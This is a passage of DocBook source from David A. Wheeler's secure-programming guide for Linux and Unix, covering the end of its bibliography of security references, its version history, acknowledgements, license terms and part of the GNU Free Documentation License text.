<ulink url="http://www.nii.co.in/tuaph.html">http://www.nii.co.in/tuaph.html</ulink>.
</para>

<para>
[Mudge 1995]
Mudge.
October 20, 1995.
<emphasis remap="it">How to write Buffer Overflows</emphasis>.
l0pht advisories.
<ulink
url="http://www.l0pht.com/advisories/bufero.html">http://www.l0pht.com/advisories/bufero.html</ulink>.
</para>

<para>
[Murhammer 1998]
Murhammer, Martin W., Orcun Atakan, Stefan Bretz,
Larry R. Pugh, Kazunari Suzuki, and David H. Wood.
October 1998.
TCP/IP Tutorial and Technical Overview.
IBM International Technical Support Organization.
<ulink url="http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf">http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf</ulink>
</para>

<para>
[NCSA]
NCSA Secure Programming Guidelines.
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming</ulink>.
</para>

<para>
[Neumann 2000]
Neumann, Peter.
2000.
"Robust Nonproprietary Software."
Proceedings of the 2000 IEEE Symposium on Security and Privacy
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society.
pp.122-123.
</para>

<para>
[NSA 2000]
National Security Agency (NSA).
<!-- Conceivably the author should be listed as the
     Information Assurance Technical Framework Forum (IATFF), but that's
     not what the document cover says. -->
September 2000.
Information Assurance Technical Framework (IATF).
<ulink url="http://www.iatf.net">http://www.iatf.net</ulink>.
</para>

<para>
[Open Group 1997]
The Open Group.
1997.
<emphasis remap="it">Single UNIX Specification, Version 2 (UNIX 98)</emphasis>.
<ulink
url="http://www.opengroup.org/online-pubs?DOC=007908799">http://www.opengroup.org/online-pubs?DOC=007908799</ulink>.
</para>

<para>
[OSI 1999]
Open Source Initiative.
1999.
<emphasis remap="it">The Open Source Definition</emphasis>.
<ulink
url="http://www.opensource.org/osd.html">http://www.opensource.org/osd.html</ulink>.
</para>

<para>
[Opplinger 1998]
Oppliger, Rolf.
1998.
Internet and Intranet Security.
Norwood, MA: Artech House.
ISBN 0-89006-829-1.
</para>

<para>
[Paulk 1993a]
Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber.
Capability Maturity Model for Software, Version 1.1.
Software Engineering Institute, CMU/SEI-93-TR-24.
DTIC Number ADA263403, February 1993.
<ulink url="http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html">http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html</ulink>.
</para>


<para>
[Paulk 1993b]
Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth Chrissis, and Marilyn W.  Bush.
Key Practices of the Capability Maturity Model, Version 1.1.
Software Engineering Institute.
CMU/SEI-93-TR-25, DTIC Number ADA263432, February 1993.
</para>

<para>
[Peteanu 2000]
Peteanu, Razvan.
July 18, 2000.
Best Practices for Secure Web Development.
<ulink url="http://members.home.net/razvan.peteanu">http://members.home.net/razvan.peteanu</ulink>
</para>

<para>
[Pfleeger 1997]
Pfleeger, Charles P.
1997.
<emphasis remap="it">Security in Computing.</emphasis>
Upper Saddle River, NJ: Prentice-Hall PTR.
ISBN 0-13-337486-6.
</para>

<para>
[Phillips 1995]
Phillips, Paul.
September 3, 1995.
<emphasis remap="it">Safe CGI Programming</emphasis>.
<ulink
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt</ulink>
</para>

<para>
[Quintero 1999]
Quintero, Federico Mena,
Miguel de Icaza, and Morten Welinder.
GNOME Programming Guidelines.
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">http://developer.gnome.org/doc/guides/programming-guidelines/book1.html</ulink>
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
</para>

<para>
[Raymond 1997]
Raymond, Eric.
1997.
<emphasis remap="it">The Cathedral and the Bazaar</emphasis>.
<ulink
url="http://www.catb.org/~esr/writings/cathedral-bazaar">http://www.catb.org/~esr/writings/cathedral-bazaar</ulink>
</para>

<para>
[Raymond 1998]
Raymond, Eric.
April 1998.
<emphasis remap="it">Homesteading the Noosphere</emphasis>.
<ulink
url="http://www.catb.org/~esr/writings/homesteading/homesteading.html">http://www.catb.org/~esr/writings/homesteading/homesteading.html</ulink>
</para>

<para>
[Ranum 1998]
Ranum, Marcus J.
1998.
<emphasis remap="it">Security-critical coding for programmers -
a C and UNIX-centric full-day tutorial</emphasis>.
<ulink
url="http://www.clark.net/pub/mjr/pubs/pdf/">http://www.clark.net/pub/mjr/pubs/pdf/</ulink>.
</para>

<para>
[RFC 822]
August 13, 1982.
<emphasis remap="it">Standard for the Format of ARPA Internet Text Messages</emphasis>.
IETF RFC 822.
<ulink
url="http://www.ietf.org/rfc/rfc0822.txt">http://www.ietf.org/rfc/rfc0822.txt</ulink>.
</para>

<para>
[rfp 1999]
rain.forest.puppy.
1999.
``Perl CGI problems''.
<emphasis remap="it">Phrack Magazine</emphasis>.
Issue 55, Article 07.
<ulink
url="http://www.phrack.com/search.phtml?view&amp;article=p55-7">http://www.phrack.com/search.phtml?view&amp;article=p55-7</ulink> or
<ulink url="http://www.insecure.org/news/P55-07.txt">http://www.insecure.org/news/P55-07.txt</ulink>.
</para>

<para>
[Rijmen 2000]
Rijmen, Vincent.
"LinuxSecurity.com Speaks With AES Winner".
<ulink url="http://www.linuxsecurity.com/feature_stories/interview-aes-3.html">http://www.linuxsecurity.com/feature_stories/interview-aes-3.html</ulink>.
</para>

<para>
[Rochkind 1985]
Rochkind, Marc J.
<emphasis>Advanced Unix Programming</emphasis>.
Englewood Cliffs, NJ: Prentice-Hall, Inc.
ISBN 0-13-011818-4.
</para>

<para>
[Sahu 2002]
Sahu, Bijaya Nanda,
Srinivasan S. Muthuswamy,
Satya Nanaji Rao Mallampalli, and
Venkata R. Bonam.
July 2002.
``Is your Java code secure -- or exposed?
Build safer applications now to avoid trouble later''.
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain
</ulink>
</para>

<para>
[St. Laurent 2000]
St. Laurent, Simon.
February 2000.
<emphasis remap="it">XTech 2000 Conference Reports</emphasis>.
``When XML Gets Ugly''.
<ulink
url="http://www.xml.com/pub/2000/02/xtech/megginson.html">http://www.xml.com/pub/2000/02/xtech/megginson.html</ulink>.
</para>

<para>
[Saltzer 1974]
Saltzer, J.
July 1974.
``Protection and the Control of Information Sharing in MULTICS''.
<emphasis remap="it">Communications of the ACM</emphasis>.
v17 n7.
pp. 388-402.
</para>

<para>
[Saltzer 1975]
Saltzer, J., and M. Schroeder.
September 1975.
``The Protection of Information in Computing Systems''.
<emphasis remap="it">Proceedings of the IEEE</emphasis>.
v63 n9.
pp. 1278-1308.
<ulink
url="http://www.mediacity.com/~norm/CapTheory/ProtInf">http://www.mediacity.com/~norm/CapTheory/ProtInf</ulink>.
Summarized in [Pfleeger 1997, 286].
</para>

<para>
[Schneider 2000]
Schneider, Fred B.
2000.
"Open Source in Security: Visiting the Bizarre."
Proceedings of the 2000 IEEE Symposium on Security and Privacy
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society.
pp.126-127.
</para>

<para>
[Schneier 1996]
Schneier, Bruce.
1996.
<emphasis remap="it">Applied Cryptography, Second Edition:
Protocols, Algorithms, and Source Code in C</emphasis>.
New York: John Wiley and Sons.
ISBN 0-471-12845-7.
</para>

<para>
[Schneier 1998]
Schneier, Bruce and Mudge.
November 1998.
<emphasis remap="it">Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol (PPTP)</emphasis>
Proceedings of the 5th ACM Conference on Communications and Computer Security,
ACM Press.
<ulink
url="http://www.counterpane.com/pptp.html">http://www.counterpane.com/pptp.html</ulink>.
</para>

<para>
[Schneier 1999]
Schneier, Bruce.
September 15, 1999.
``Open Source and Security''.
<emphasis remap="it">Crypto-Gram</emphasis>.
Counterpane Internet Security, Inc.
<ulink
url="http://www.counterpane.com/crypto-gram-9909.html">http://www.counterpane.com/crypto-gram-9909.html</ulink>
</para>

<para>
[Seifried 1999]
Seifried, Kurt.
October 9, 1999.
<emphasis remap="it">Linux Administrator's Security Guide</emphasis>.
<ulink
url="http://www.securityportal.com/lasg">http://www.securityportal.com/lasg</ulink>.
</para>

<para>
[Seifried 2001]
Seifried, Kurt.
September 2, 2001.
WWW Authentication.
<ulink url="http://www.seifried.org/security/www-auth/index.html">
http://www.seifried.org/security/www-auth/index.html</ulink>.
</para>


<para>
[Shankland 2000]
Shankland, Stephen.
``Linux poses increasing threat to Windows 2000''.
CNET.
<ulink
url="http://news.cnet.com/news/0-1003-200-1549312.html">http://news.cnet.com/news/0-1003-200-1549312.html</ulink>
</para>

<para>
[Shostack 1999]
Shostack, Adam.
June 1, 1999.
<emphasis remap="it">Security Code Review Guidelines</emphasis>.
<ulink
url="http://www.homeport.org/~adam/review.html">http://www.homeport.org/~adam/review.html</ulink>.
</para>

<para>
[Sibert 1996]
Sibert, W. Olin.
Malicious Data and Computer Security.
(NIST) NISSC '96.
<ulink url="http://www.fish.com/security/maldata.html">http://www.fish.com/security/maldata.html</ulink>
</para>

<para>
[Sitaker 1999]
Sitaker, Kragen.
Feb 26, 1999.
<emphasis remap="it">How to Find Security Holes</emphasis>.
<ulink
url="http://www.pobox.com/~kragen/security-holes.html">http://www.pobox.com/~kragen/security-holes.html</ulink> and
<ulink
url="http://www.dnaco.net/~kragen/security-holes.html">http://www.dnaco.net/~kragen/security-holes.html</ulink>
</para>

<para>
[SSE-CMM 1999]
SSE-CMM Project.
April 1999.
<emphasis remap="it">Systems Security Engineering Capability Maturity Model (SSE CMM)
Model Description Document</emphasis>.
Version 2.0.
<ulink
url="http://www.sse-cmm.org">http://www.sse-cmm.org</ulink>
</para>

<para>
[Stallings 1996]
Stallings, William.
Practical Cryptography for Data Internetworks.
Los Alamitos, CA: IEEE Computer Society Press.
ISBN 0-8186-7140-8.
</para>

<para>
[Stein 1999]
Stein, Lincoln D.
September 13, 1999.
<emphasis remap="it">The World Wide Web Security FAQ</emphasis>.
Version 2.0.1.
<ulink
url="http://www.w3.org/Security/Faq/www-security-faq.html">http://www.w3.org/Security/Faq/www-security-faq.html</ulink>
</para>

<para>
[Swan 2001]
Swan, Daniel.
January 6, 2001.
comp.os.linux.security FAQ.
Version 1.0.
<ulink url="http://www.linuxsecurity.com/docs/colsfaq.html">http://www.linuxsecurity.com/docs/colsfaq.html</ulink>.
</para>

<para>
[Swanson 1996]
Swanson, Marianne, and Barbara Guttman.
September 1996.
Generally Accepted Principles and Practices for Securing
Information Technology Systems.
NIST Computer Security Special Publication (SP) 800-14.
<ulink url="http://csrc.nist.gov/publications/nistpubs/index.html">http://csrc.nist.gov/publications/nistpubs/index.html</ulink>.
</para>

<para>
[Thompson 1974]
Thompson, K. and D.M. Ritchie.
July 1974.
``The UNIX Time-Sharing System''.
<emphasis remap="it">Communications of the ACM</emphasis>
Vol. 17, No. 7.
pp. 365-375.
<!-- Revised and reprinted in Ritchie 1978a; see Bach 1986 -->
</para>

<para>
[Torvalds 1999]
Torvalds, Linus.
February 1999.
``The Story of the Linux Kernel''.
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
Edited by Chris Dibona, Mark Stone, and Sam Ockman.
O'Reilly and Associates.
ISBN 1565925823.
<ulink
url="http://www.oreilly.com/catalog/opensources/book/linus.html">http://www.oreilly.com/catalog/opensources/book/linus.html</ulink>
</para>

<para>
[TruSecure 2001]
TruSecure.
August 2001.
Open Source Security: A Look at the Security Benefits of Source Code Access.
<ulink url="http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf">http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf</ulink>
</para>

<para>
[Unknown]
<emphasis remap="it">SETUID(7)</emphasis>
<ulink
url="http://www.homeport.org/~adam/setuid.7.html">http://www.homeport.org/~adam/setuid.7.html</ulink>.
<!-- Claimed to be from Dan Farmer's COPS, but COPS does not include it. -->
</para>

<para>
[Van Biesbrouck 1996]
Van Biesbrouck, Michael.
April 19, 1996.
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec</ulink>.
</para>

<para>
[van Oorschot 1994]
van Oorschot, P. and M. Wiener.
November 1994.
``Parallel Collision Search with Applications to Hash Functions
and Discrete Logarithms.''
Proceedings of ACM Conference on Computer and Communications Security.
</para>

<para>
[Venema 1996]
Venema, Wietse.
1996.
Murphy's law and computer security.
<ulink url="http://www.fish.com/security/murphy.html">http://www.fish.com/security/murphy.html</ulink>
</para>

<para>
[Viega 2002]
Viega, John, and Gary McGraw.
2002.
Building Secure Software.
Addison-Wesley.
ISBN 0-201-72152-X.
</para>

<para>
[Watters 1996]
Watters, Aaron, Guido van Rossum, and James C. Ahlstrom.
1996.
Internet Programming with Python.
NY, NY: Henry Holt and Company, Inc.
</para>

<para>
[Wheeler 1996]
Wheeler, David A., Bill Brykczynski, and Reginald N. Meeson, Jr.
Software Inspection: An Industry Best Practice.
1996.
Los Alamitos, CA: IEEE Computer Society Press.
IEEE Computer Society Press Order Number BP07340.
Library of Congress Number 95-41054.
ISBN 0-8186-7340-0.
</para>

<para>
[Witten 2001]
Witten, Brian, Carl Landwehr, and Michael Caloyannides.
September/October 2001.
``Does Open Source Improve System Security?''
IEEE Software.
pp. 57-61.
<ulink url="http://www.computer.org/software">http://www.computer.org/software</ulink>

</para>

<para>
[Wood 1985]
Wood, Patrick H. and Stephen G. Kochan.
1985.
<emphasis remap="it">Unix System Security</emphasis>.
Indianapolis, Indiana: Hayden Books.
ISBN 0-8104-6267-2.
</para>

<para>
[Wreski 1998]
Wreski, Dave.
August 22, 1998.
<emphasis remap="it">Linux Security Administrator's Guide</emphasis>.
Version 0.98.
<ulink
url="http://www.nic.com/~dave/SecurityAdminGuide/index.html">http://www.nic.com/~dave/SecurityAdminGuide/index.html</ulink>
</para>

<para>
[Yoder 1998]
Yoder, Joseph and Jeffrey Barcalow.
1998.
Architectural Patterns for Enabling Application Security.
PLoP '97.
<ulink url="http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf">
http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf</ulink>
</para>

<para>
[Zalewski 2001]
Zalewski, Michael.
May 16-17, 2001.
Delivering Signals for Fun and Profit:
Understanding, exploiting and preventing signal-handling related
vulnerabilities.
Bindview Corporation.
<ulink url="http://razor.bindview.com/publish/papers/signals.txt">http://razor.bindview.com/publish/papers/signals.txt</ulink>
</para>

<para>
[Zoebelein 1999]
Zoebelein, Hans U.
April 1999.
The Internet Operating System Counter.
<ulink url="http://www.leb.net/hzo/ioscount">http://www.leb.net/hzo/ioscount</ulink>.
</para>

</chapter>

<appendix id="document-history">
<title>History</title>
<para>
Here are a few key events in the development of this book, starting
with the most recent:

<variablelist>

<varlistentry><term>
2002-10-29 David A. Wheeler
</term>
<listitem>
<para>
Version 3.000 released, adding a new section on determining
security requirements and a discussion of the Common Criteria,
broadening the document.
Many smaller improvements were incorporated as well.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2001-01-01 David A. Wheeler
</term>
<listitem>
<para>
Version 2.70 released, adding a significant amount of new material,
including a major expansion of the discussion of cross-site
malicious content, HTML/URI filtering, and handling temporary files.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2000-05-24 David A. Wheeler
</term>
<listitem>
<para>
Switched to GNU's GFDL license, added more content.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2000-04-21 David A. Wheeler
</term>
<listitem>
<para>
Version 2.00 released, dated 21 April 2000, which switched the
document's internal format from the Linuxdoc DTD to the DocBook DTD.
Thanks to Jorge Godoy for helping me perform the transition.
</para>
</listitem>
</varlistentry>


<varlistentry><term>
2000-04-04 David A. Wheeler
</term>
<listitem>
<para>
Version 1.60 released;
changed so that it now covers <emphasis>both</emphasis> Linux and Unix.
Most of the guidelines already applied to both, and many (perhaps most)
application developers want their programs to run on both,
so it made sense to cover both.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2000-02-09 David A. Wheeler
</term>
<listitem>
<para>
Noted that the document is now part of the Linux Documentation Project (LDP).
</para>
</listitem>
</varlistentry>

<varlistentry><term>
1999-11-29 David A. Wheeler
</term>
<listitem>
<para>
Initial version (1.0) completed and released to the public.
</para>
</listitem>
</varlistentry>

</variablelist>
</para>

<para>
Note that a more detailed description of changes is available on-line
in the ``ChangeLog'' file.
</para>
</appendix>

<appendix id="acknowledgements">
<title>Acknowledgements</title>

<epigraph>
<attribution>Proverbs 27:17 (NIV)</attribution>
<para>
As iron sharpens iron, so one man sharpens another.
</para>
</epigraph>

<para>
My thanks to the following people who kept me honest by sending me emails
noting errors, suggesting areas to cover, asking questions, and so on.
Where email addresses are included, they've been
shrouded by prepending ``thanks.'' so that bulk emailers
won't easily harvest these addresses; inclusion of people in this list is
<emphasis>not</emphasis> an authorization to send
unsolicited bulk email to them.

<itemizedlist>
<listitem><para>
Neil Brown (thanks.neilb@cse.unsw.edu.au)
</para></listitem>

<listitem><para>
Martin Douda (thanks.mad@students.zcu.cz)
</para></listitem>

<listitem><para>
Jorge Godoy
</para></listitem>

<listitem><para>
Scott Ingram (thanks.scott@silver.jhuapl.edu)
</para></listitem>

<listitem><para>
Michael Kerrisk
</para></listitem>

<listitem><para>
Doug Kilpatrick
</para></listitem>

<listitem><para>
John Levon (levon@movementarian.org)
<!-- was John Levon (moz@compsoc.man.ac.uk) -->
</para></listitem>

<listitem><para>
Ryan McCabe (thanks.odin@numb.org)
</para></listitem>

<listitem><para>
Paul Millar (thanks.paulm@astro.gla.ac.uk)
</para></listitem>

<listitem><para>
Chuck Phillips (thanks.cdp@peakpeak.com)
</para></listitem>

<listitem><para>
Martin Pool (thanks.mbp@humbug.org.au)
</para></listitem>

<listitem><para>
Eric S. Raymond (thanks.esr@snark.thyrsus.com)
</para></listitem>

<listitem><para>
Marc Welz
</para></listitem>

<listitem><para>
Eric Werme (thanks.werme@alpha.zk3.dec.com)
</para></listitem>

</itemizedlist>

</para>

<para>
If you want to be on this list, please send me a constructive suggestion at
<ulink
url="mailto:dwheeler@dwheeler.com">dwheeler@dwheeler.com</ulink>.
If you send me a constructive suggestion, but do <emphasis remap="it">not</emphasis> want credit,
please let me know that when you send your suggestion, comment, or
criticism; normally I expect that people want credit, and I want to give
them that credit.
My current process is to add contributor names to this list in the document,
with a more detailed explanation of their comments in the ChangeLog for
this document (available on-line).
Note that although these people have sent in ideas, the actual text is my own,
so don't blame them for any errors that may remain.
Instead, please send me another constructive suggestion.
</para>

</appendix>

<appendix id="about-license">
<title>About the Documentation License</title>

<epigraph>
<attribution>Esther 3:14 (NIV)</attribution>
<para>
A copy of the text of the edict was to be issued as law
in every province and made known to the people of every
nationality so they would be ready for that day.
</para>
</epigraph>

<para>
This document is Copyright (C) 1999-2000 David A. Wheeler.
Permission is granted to copy, distribute and/or modify
this document under the terms of the GNU Free Documentation License (FDL),
Version 1.1 or any later version published by the Free Software Foundation;
with the invariant sections being ``About the Author'',
with no Front-Cover Texts, and no Back-Cover Texts.
A copy of the license is included below in
<xref linkend="fdl">.
</para>

<para>
These terms do permit mirroring by other web sites,
but be <emphasis remap="it">sure</emphasis> to do the following:

<itemizedlist>
<listitem>

<para>
make sure your mirrors automatically get upgrades from the master site,
</para>
</listitem>
<listitem>
<para>
clearly show the location of the master site
(<ulink
url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>), with a hypertext link
to the master site, and
</para>
</listitem>

<listitem>
<para>
give me (David A. Wheeler) credit as the author.
</para>
</listitem>

</itemizedlist>

</para>

<para>
The first two points primarily protect me from repeatedly hearing about
obsolete bugs.
I do not want to hear about bugs I fixed a year ago, just because you
are not properly mirroring the document.
By linking to the master site,
users can check and see if your mirror is up-to-date.
I'm sensitive to the problems of sites which have very
strong security requirements and therefore cannot risk normal
connections to the Internet; if that describes your situation,
at least try to meet the other points
and try to occasionally sneakernet updates into your environment.
</para>

<para>
By this license, you may modify the document,
but you can't claim that what you didn't write is yours (i.e., plagiarism)
nor can you pretend that a modified version is identical to
the original work.
Modifying the work does not transfer copyright of the entire work to you;
this is not a ``public domain'' work in terms of copyright law.
See the license in <xref linkend="fdl"> for details.
If you have questions about what the license allows, please contact me.
In most cases, it's better if you send your changes to the master
integrator (currently David A. Wheeler), so that your changes will be
integrated with everyone else's changes into the master copy.
</para>

<para>
I am not a lawyer; nevertheless, it's my position as an author
and software developer that any code fragments
not explicitly marked otherwise are so small that their use fits under
the ``fair use'' doctrine in copyright law.
In other words, unless marked otherwise, you can use the code fragments
without any restriction at all.
Copyright law does not permit copyrighting absurdly small components
of a work
(e.g., ``I own all rights to B-flat and B-flat minor chords''), and
the fragments not marked otherwise are of the same kind of minuscule
size when compared to real programs.
I've done my best to give credit for specific pieces of code
written by others.
Some of you may still be concerned about the legal status of this code,
and I want to make sure that it's clear
that you can use this code in your software.
Therefore, code fragments included directly in this document not otherwise
marked have also been released by me under the terms of the ``MIT license'',
to assure you that there's no serious legal encumbrance:
</para>

<programlisting width="66">
  Source code in this book not otherwise identified is
  Copyright (c) 1999-2001 David A. Wheeler.

  Permission is hereby granted, free of charge, to any person
  obtaining a copy of the source code in this book not
  otherwise identified (the "Software"), to deal in the
  Software without restriction, including without limitation
  the rights to use, copy, modify, merge, publish, distribute,
  sublicense, and/or sell copies of the Software, and to
  permit persons to whom the Software is furnished to do so,
  subject to the following conditions:

  The above copyright notice and this permission notice shall be
  included in all copies or substantial portions of the Software.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
  WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
  PURPOSE AND NONINFRINGEMENT.
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
  LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
  ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
  OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
</programlisting>

</appendix>


<!-- Previously it had label="A" -->
<appendix id="fdl">
  <title>GNU Free Documentation License</title>
  <para>
    Version 1.1, March 2000
  </para>

  <para>
    Copyright &copy; 2000
    <address>
      Free Software Foundation, Inc.
      <street>59 Temple Place, Suite 330</street>,
      <city>Boston</city>,
      <state>MA</state>
      <postcode>02111-1307</postcode>
      <country>USA</country>
    </address>
    Everyone is permitted to copy and distribute verbatim copies of this license
    document, but changing it is not allowed.
  </para>

  <variablelist>
    <varlistentry id="fdl-preamble">
      <term>0. PREAMBLE</term>
      <listitem>
	<para>
	  The purpose of this License is to make a manual, textbook, or other
	  written document "free" in the sense of freedom: to assure everyone
	  the effective freedom to copy and redistribute it, with or without
	  modifying it, either commercially or noncommercially. Secondarily,
	  this License preserves for the author and publisher a way to get
	  credit for their work, while not being considered responsible for
	  modifications made by others.
	</para>

	<para>
	  This License is a kind of "copyleft", which means that derivative
	  works of the document must themselves be free in the same sense. It
	  complements the GNU General Public License, which is a copyleft
	  license designed for free software.
	</para>

	<para>
	  We have designed this License in order to use it for manuals for free
	  software, because free software needs free documentation: a free
	  program should come with manuals providing the same freedoms that the
	  software does. But this License is not limited to software manuals; it
	  can be used for any textual work, regardless of subject matter or
	  whether it is published as a printed book. We recommend this License
	  principally for works whose purpose is instruction or reference.
	</para>
      </listitem>
    </varlistentry>
    <varlistentry id="fdl-section1">
      <term>1. APPLICABILITY AND DEFINITIONS</term>
      <listitem>
	<para id="fdl-document">
	  This License applies to any manual or other work that contains a
	  notice placed by the copyright holder saying it can be distributed
	  under the terms of this License. The <link
	  linkend="fdl-document">"Document" </link>, below, refers to any such
	  manual or work. Any member of the public is a licensee, and is
	  addressed as "you".
	</para>

	<para id="fdl-modified">
	  A <link linkend="fdl-modified">"Modified Version"</link> of the
	  Document means any work containing the Document or a portion of it,
	  either copied verbatim, or with modifications and/or translated into
	  another language.
	</para>

	<para id="fdl-secondary">
	  A <link linkend="fdl-secondary">"Secondary Section"</link> is a named
	  appendix or a front-matter section of the <link
	  linkend="fdl-document">Document</link> that deals exclusively with the
	  relationship of the publishers or authors of the <link
	  linkend="fdl-document"> Document</link> to the <link
	  linkend="fdl-document"> Document's</link> overall subject (or to
	  related matters) and contains nothing that could fall directly within
	  that overall subject. (For example, if the <link
	  linkend="fdl-document">Document</link> is in part a textbook of
	  mathematics, a <link linkend="fdl-secondary">Secondary Section</link>
	  may not explain any mathematics.)  The relationship could be a matter
	  of historical connection with the subject or with related matters, or
	  of legal, commercial, philosophical, ethical or political position
	  regarding them.
	</para>

	<para id="fdl-invariant">
	  The <link linkend="fdl-invariant">"Invariant Sections"</link> are
	  certain <link linkend="fdl-secondary"> Secondary Sections</link> whose
	  titles are designated, as being those of <link
	  linkend="fdl-invariant">Invariant Sections</link>, in the notice that
	  says that the <link linkend="fdl-document">Document</link> is released
	  under this License.
	</para>

	<para id="fdl-cover-texts">
	  The <link linkend="fdl-cover-texts">"Cover Texts"</link> are certain
	  short passages of text that are listed, as <link
	  linkend="fdl-cover-texts">Front-Cover Texts</link> or <link
	  linkend="fdl-cover-texts">Back-Cover Texts</link>, in the notice that
	  says that the <link linkend="fdl-document">Document</link> is released
	  under this License.
	</para>

	<para id="fdl-transparent">
	  A <link linkend="fdl-transparent">"Transparent"</link> copy of the
	  <link linkend="fdl-document"> Document</link> means a machine-readable
	  copy, represented in a format whose specification is available to the
	  general public, whose contents can be viewed and edited directly and
	  straightforwardly with generic text editors or (for images composed of
	  pixels) generic paint programs or (for drawings) some widely available
	  drawing editor, and that is suitable for input to text formatters or
	  for automatic translation to a variety of formats suitable for input
	  to text formatters. A copy made in an otherwise <link
	  linkend="fdl-transparent"> Transparent</link> file format whose markup
	  has been designed to thwart or discourage subsequent modification by
	  readers is not <link linkend="fdl-transparent">Transparent</link>.  A
	  copy that is not <link linkend="fdl-transparent">"Transparent"</link>
	  is called "Opaque".
	</para>

	<para>
	  Examples of suitable formats for <link
	  linkend="fdl-transparent">Transparent</link> copies include plain
	  ASCII without markup, Texinfo input format, LaTeX input format, SGML
	  or XML using a publicly available DTD, and standard-conforming simple
	  HTML designed for human modification. Opaque formats include
	  PostScript, PDF, proprietary formats that can be read and edited only
	  by proprietary word processors, SGML or XML for which the DTD and/or
	  processing tools are not generally available, and the
	  machine-generated HTML produced by some word processors for output
	  purposes only.
	</para>

	<para id="fdl-title-page">
	  The <link linkend="fdl-title-page">"Title Page"</link> means, for a
	  printed book, the title page itself, plus such following pages as are
	  needed to hold, legibly, the material this License requires to appear
	  in the title page. For works in formats which do not have any title
	  page as such, <link linkend="fdl-title-page"> "Title Page"</link>
	  means the text near the most prominent appearance of the work's title,
	  preceding the beginning of the body of the text.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section2">
      <term>2. VERBATIM COPYING</term>
      <listitem>
	<para>
	  You may copy and distribute the <link
	  linkend="fdl-document">Document</link> in any medium, either
	  commercially or noncommercially, provided that this License, the
	  copyright notices, and the license notice saying this License applies
	  to the <link linkend="fdl-document">Document</link> are reproduced in
	  all copies, and that you add no other conditions whatsoever to those
	  of this License. You may not use technical measures to obstruct or
	  control the reading or further copying of the copies you make or
	  distribute. However, you may accept compensation in exchange for
	  copies. If you distribute a large enough number of copies you must
	  also follow the conditions in <link linkend="fdl-section3">section
	  3</link>.
	</para>

	<para>
	  You may also lend copies, under the same conditions stated above, and
	  you may publicly display copies.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section3">
      <term>3. COPYING IN QUANTITY</term>
      <listitem>
	<para>
	  If you publish printed copies of the <link
	  linkend="fdl-document">Document</link> numbering more than 100, and
	  the <link linkend="fdl-document">Document's</link> license notice
	  requires <link linkend="fdl-cover-texts">Cover Texts</link>, you must
	  enclose the copies in covers that carry, clearly and legibly, all
	  these <link linkend="fdl-cover-texts">Cover Texts</link>:  Front-Cover
	  Texts on the front cover, and Back-Cover Texts on the back cover. Both
	  covers must also clearly and legibly identify you as the publisher of
	  these copies. The front cover must present the full title with all
	  words of the title equally prominent and visible. You may add other
	  material on the covers in addition. Copying with changes limited to
	  the covers, as long as they preserve the title of the <link
	  linkend="fdl-document">Document</link> and satisfy these conditions,
	  can be treated as verbatim copying in other respects.
	</para>

	<para>
	  If the required texts for either cover are too voluminous to fit
	  legibly, you should put the first ones listed (as many as fit
	  reasonably) on the actual cover, and continue the rest onto adjacent
	  pages.
	</para>

	<para>
	  If you publish or distribute <link
	  linkend="fdl-transparent">Opaque</link> copies of the <link
	  linkend="fdl-document">Document</link> numbering more than 100, you
	  must either include a machine-readable <link
	  linkend="fdl-transparent">Transparent</link> copy along with each
	  <link linkend="fdl-transparent">Opaque</link> copy, or state in or
	  with each <link linkend="fdl-transparent">Opaque</link> copy a
	  publicly-accessible computer-network location containing a complete
	  <link linkend="fdl-transparent"> Transparent</link> copy of the <link
	  linkend="fdl-document">Document</link>, free of added material, which
	  the general network-using public has access to download anonymously at
	  no charge using public-standard network protocols. If you use the
	  latter option, you must take reasonably prudent steps, when you begin
	  distribution of <link linkend="fdl-transparent">Opaque</link> copies
	  in quantity, to ensure that this <link
	  linkend="fdl-transparent">Transparent</link> copy will remain thus
	  accessible at the stated location until at least one year after the
	  last time you distribute an <link
	  linkend="fdl-transparent">Opaque</link> copy (directly or through your
